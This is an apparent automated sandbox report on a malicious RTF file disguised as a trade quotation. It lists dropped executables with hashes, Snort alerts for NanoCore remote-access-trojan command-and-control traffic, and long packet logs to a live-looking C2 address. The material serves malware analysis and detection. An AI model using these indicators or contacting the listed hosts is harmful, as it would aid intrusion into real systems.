Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\subfolder1\filename1.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	4.856871861209239
Encrypted:	false
SSDEEP:	3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
MD5:	A6AD1C3046A3CF0C6992507F2886AAB3
SHA1:	8024E4315C4BD196F1531E08C541359DBAC70A39
SHA-256:	CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
SHA-512:	A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	131072
Entropy (8bit):	4.856871861209239
Encrypted:	false
SSDEEP:	3072:6wVUP1A3a64iOR/VfgmLQPDBZByQqFXrMQqwV:6wVUPH6GfgmLQPDBZByQqFXIQqwV
MD5:	A6AD1C3046A3CF0C6992507F2886AAB3
SHA1:	8024E4315C4BD196F1531E08C541359DBAC70A39
SHA-256:	CEF944407A26C3C148AFBF8253BAA55AEE7CDFAEC17B5A158831574245BAC8AD
SHA-512:	A5C0796BCCE3CEDE14CC02915A4A0A55AEEAFD0B0675AF8FE395905F9ED78A58CBDCED5EE89CFBDD7E55B90A5AED2D647C76EE3BB9DD35E778DA19680768F21A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L.....Y.................P...................`....@.........................................................................tY..(....p.....................................................................(... ....................................text....M.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.068615237294724
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
File size:	967360
MD5:	bc1c94e783483f1c218efb5dcaf5f67e
SHA1:	7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
SHA256:	d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
SHA512:	e399eeecd3067441e52ddcbb394a8547e1ed20fb262a8c70ffc37ac49b6854410011e23d1405c94d6aded1ca32627b8a1f27bf35c7d2d1767dfffbbf3f3a7f17
SSDEEP:	24576:X6767676767676767676767676767676767676767676767676q5j:quuuuuuuuuuuuuuuuuuuuuuuus
File Content Preview:	{\rtf33843\page51787859448176035@m42JEUa4SrclZjjE@-KI2WTYrCCIYwauZ0C<eh&&7_M-C_D--_-V,64>88964$Cv>yt=n6\|:%_>jn8%bm\mklP;=u\k6588.14.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000D9BB0h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/25/21-07:31:12.865275	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49171	4488	192.168.2.22	194.5.98.202
02/25/21-07:31:18.959312	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49172	4488	192.168.2.22	194.5.98.202
02/25/21-07:31:26.516121	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49173	4488	192.168.2.22	194.5.98.202
02/25/21-07:31:32.853198	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49174	4488	192.168.2.22	194.5.98.202
02/25/21-07:31:39.738064	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49175	4488	192.168.2.22	194.5.98.202

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:29:14.575544119 CET	49165	80	192.168.2.22	67.199.248.10
Feb 25, 2021 07:29:14.626983881 CET	80	49165	67.199.248.10	192.168.2.22
Feb 25, 2021 07:29:14.627127886 CET	49165	80	192.168.2.22	67.199.248.10
Feb 25, 2021 07:29:14.627883911 CET	49165	80	192.168.2.22	67.199.248.10
Feb 25, 2021 07:29:14.679239988 CET	80	49165	67.199.248.10	192.168.2.22
Feb 25, 2021 07:29:14.770637989 CET	80	49165	67.199.248.10	192.168.2.22
Feb 25, 2021 07:29:14.770742893 CET	49165	80	192.168.2.22	67.199.248.10
Feb 25, 2021 07:29:14.934967041 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:14.986754894 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:14.987035036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:15.002682924 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:15.057116032 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:15.057153940 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:15.057266951 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:15.057316065 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:15.069318056 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:15.124504089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:15.124650002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:16.673723936 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:16.754147053 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999515057 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999567032 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999798059 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:16.999907970 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999948025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999984980 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:16.999989986 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.000025034 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.000046015 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.000701904 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.000741959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.000777006 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.000799894 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.000830889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.001118898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.001157999 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.001193047 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.001195908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.001216888 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.001255989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.001569986 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.001612902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.001647949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.001668930 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.008138895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.051927090 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.051981926 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052119017 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052165985 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052170992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052200079 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052217007 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052244902 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052256107 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052284956 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052297115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052316904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052345037 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052361012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052386045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052406073 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052426100 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052454948 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052464962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052479029 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052512884 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052530050 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052557945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052572966 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052617073 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052823067 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052864075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052885056 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052902937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052908897 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052941084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052961111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.052979946 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.052989960 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053019047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.053040981 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053081036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053147078 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.053188086 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.053210974 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053231955 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053481102 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.053522110 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.053548098 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.053575039 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.055668116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104232073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104295969 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104334116 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104377031 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104413986 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104461908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104470968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104502916 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104506016 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104509115 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104513884 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104527950 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104545116 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104576111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104585886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104614973 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104625940 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104652882 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104665041 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104672909 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104705095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104724884 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104743958 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104769945 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104793072 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104794025 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104835033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104856014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104872942 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104887962 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104912043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104932070 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104950905 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.104959011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.104981899 CET	443	49166	5.79.72.163	192.168.2.22
Feb 25, 2021 07:29:17.105017900 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.105031967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.107295990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.423775911 CET	49166	443	192.168.2.22	5.79.72.163
Feb 25, 2021 07:29:17.423780918 CET	49165	80	192.168.2.22	67.199.248.10
Feb 25, 2021 07:31:12.576642990 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:12.837364912 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:12.837501049 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:12.865274906 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.175729990 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.175843000 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.267266035 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.267388105 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.476042032 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.476140022 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.579427958 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.579516888 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.739420891 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.739561081 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:13.880458117 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:13.880669117 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.034123898 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.034208059 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.190299988 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.190392017 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.269661903 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.269690990 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.269714117 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.269727945 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.269807100 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.270373106 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.270458937 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.270479918 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.270500898 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.270518064 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.270591021 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.272195101 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.272218943 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.272306919 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.273361921 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.332000017 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.470638037 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.494132996 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.494235039 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.527446032 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.527473927 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.527522087 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.527555943 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.529478073 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.529521942 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.529535055 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.529933929 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.529959917 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.529984951 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.530332088 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.530361891 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.530405045 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.532267094 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.532341957 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.532536030 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.533339977 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.533368111 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.533399105 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.534130096 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.534153938 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.534209967 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.535597086 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.535628080 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.535650015 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.535686970 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.535698891 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.659320116 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.732604980 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.732652903 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.732721090 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.734435081 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.782509089 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.782530069 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.782569885 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.782648087 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.783525944 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.783533096 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.784357071 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.784373045 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.784390926 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.784439087 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.784449100 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.784454107 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.784456968 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.784485102 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.788223028 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.788300991 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.788446903 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.788511038 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.789448977 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.789465904 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.789529085 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.789532900 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.790438890 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.790457010 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.790517092 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.790522099 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.790539026 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.790554047 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.790595055 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.790817976 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.792337894 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.792402029 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.793421984 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.793442011 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.793488979 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.793497086 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.794220924 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.794246912 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.794275999 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.795049906 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.795377016 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.795423031 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.795533895 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.795846939 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.796406031 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.796451092 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.796555042 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.796597004 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.797622919 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.797650099 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.797703028 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.798031092 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.798331022 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.798351049 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.798405886 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.798410892 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.799392939 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.799412966 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.799473047 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.799602985 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.800225973 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.800461054 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.800522089 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.800527096 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.801455021 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.801476002 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.801532984 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.801546097 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.802205086 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.802258968 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:14.803211927 CET	4488	49171	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:14.803303003 CET	49171	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:18.684247017 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:18.951478958 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:18.951571941 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:18.959311962 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:19.291383982 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:19.291497946 CET	49172	4488	192.168.2.22	194.5.98.202
Feb 25, 2021 07:31:19.411298037 CET	4488	49172	194.5.98.202	192.168.2.22
Feb 25, 2021 07:31:19.411540031 CET	49172	4488	192.168.2.22	194.5.98.202
